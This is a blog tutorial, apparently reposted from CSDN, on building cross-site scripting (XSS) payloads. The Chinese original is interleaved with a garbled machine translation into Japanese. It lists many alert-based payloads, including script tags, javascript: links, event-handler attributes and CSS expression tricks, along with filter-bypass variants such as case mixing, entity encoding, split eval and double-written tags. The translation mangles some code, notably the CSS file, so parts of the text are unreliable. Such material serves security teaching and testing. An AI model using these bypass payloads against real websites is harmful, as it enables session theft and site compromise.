建設XSS声明

建設XSS声明

ここに画像を挿入説明
[セクション]を使用して[<>]構成HTML / JS
[II]擬似プロトコル-使用したJavaScript:擬似プロトコルはXSSが構築
[三]が独自のイベントを生成する
[IV] XSSの変形
[セクション5つのセクション]ラベルや他の技術
[VI] CSSクロスサイトでの(旧)

まず使用して、[<>]設定済みのHTML / JS

可以利用[<>] 构造HTML 标签和<script> 标签。 
 在测试页面提交参数[<h1 style='color:red'> 
 利用[<>]构造HTML/JS</h1>]  提交[<script>alert(/xss/)</script>]

セクション擬似プロトコル

可以使用javascript: 伪协议的方式构造XSS
 提交参数[<a href="javascript:alert(/xss/)">touch me!</a>],然后点击超链接,即可触发XSS。
 也可以使用img 标签的伪协议,但是这种方法在IE6 下测试成功。
[<img src="javascript:alert('xss')">]

セクションには、独自のイベントを発生させます

「イベント駆動型」は、より古典的なプログラミングのアイデアです。ページ上の多くのイベントが発生します(例えば、マウスの動き、キーボード入力など)は、JSはこれらの時間に対応することができます。
私たちは、イベントJSの関数、トリガーXSSによってトリガすることができますので。
イベントの種類
Windowsイベント-------------イベントウィンドウオブジェクトがトリガー
HTMLフォーム内のフォームイベントアクションを----------------トリガイベントの
キーボードイベント------------キーボード
マウス---------------ユーザーマウスまたは同様のアクションイベントによってトリガイベント
メディアイベント--------マルチメディアによってトリガ----イベント

如:[<img src='./smile.jpg' onmouseover='alert(/xss/)'>] 
这个标签会引入一个图片,然后鼠标悬停在图片上的时候,
会触发XSS 代码。
单行文本框的键盘点击事件,
[<input type="text" onkeydown="alert(/xss/)">],当点击键盘任意一个按键的时候触发。

第四四半期の変形XSS

[1]ケース変換
[2]引用符を使用する
。[3] [/]スペースの
[4] ENTER
[5]タグの属性値がトランスコード
バイパス[6]ビス書き込み
我々はできますXSSコードがフィルタバイパスへの様々な修正、検出器XSSを構成します。バリアントは、以下のとおりであります

1.ケース変換

   可以将payload 进行大小写转化。如下面两个例子。
<Img sRc='#' Onerror="alert(/xss/)" />

<a hREf="javaScript:alert(/xss/)">click me</a>

2.引用符の使用

引用符で使用されるHTML言語は、小文字の区別はありませんが、いくつかのフィルタ機能があり、「物質的な富。」

<img src="#" onerror="alert(/xss/)"/>
<img src='#' onerror='alert(/xss/)'/>
<img src=# onerror=alert(/xss/) />

スペース3. [/]

あなたは、スペースの代わりにスラッシュを使用することができます

<Img/sRc='#'/Onerror='alert(/xss/)' />

4.入力します。

私たちは、タブ(水平タブ)とキーワード検出バイパスにはいくつかの場所でキャリッジリターンを追加することができます。

<Img/sRc='#'/Onerror ='alert(/xss/)' />
<A hREf="javascript:alert(/xss/)">click me!</a>

トランスコードタグの属性値

あなたは、フィルタバイパスにタグ属性値をトランスコードすることができます。以下のコーディングに対応

コーディング後の簡単な方法の後。

<A hREf="j&#97;v&#x61;script:alert(/xss/)">click me!</a>
    
<A hREf="&#01;j&#97;v&#x61;s&#9;c&#10;r&#13;ipt:alert(/xss/)">
click me!
</a>

6.クロスサイトスプリット

<script>z='alert'</script>
 <script>z=z+'(/xss/)'</script>
  <script>eval(z)</script>

7.書き込みダブルバイパス

<script>
   <scr<script>ipt>

8.幅の文字

   width:expression(alert(/xss/))

9. Aコメントは、ブラウザによって無視されます

幅:exprの/ * * / ession(警報(/ X S〜S /))

10.スタイルシート[]及び[\ 0]

第5節その他のラベルと実践

他の標識には、XSSをトリガするために使用することができます。

 [<svg onload="alert(/xss/)">] 这个语句还是比较简洁的。
 
 [<input onfocus=alert(/xss/) autofocus>]

クロスサイト(旧)CSSのセクションVIのタイトル

1.インラインスタイル

[<div style="background-image:url(javascript:alert(/xss/))">]

スタイルの2.内部ページ

[<style>Body{background-image:url(javascript:alert(/xss/))}</style>]

3.外部スタイル

[<link rel="stylesheet" type="text/css" href="./xss.css"><div>hello<div>]
xss.css 文件内容如下

-------------------------------------------------- --------------- H1 {
色:赤。} {DIV
/ 幅:式(アラート(/ XSS /)) /
背景画像:URL(ジャバスクリプト:警告(/ XSS /))}

4.表現

[<div style="width:expression(alert(/xss/))">]
[<style>Body{background-image:expression(alert(/xss/));}</style>]
  

5インポート

[<style>@import 'javascript:alert("xss")';</style>]
[<style type="text/css">@import url(xss.css);</style><div>AJEST</div>]
公開された223元の記事 ウォン称賛32 ビュー70000 +

おすすめ

転載: blog.csdn.net/qq_41901122/article/details/103811969
おすすめ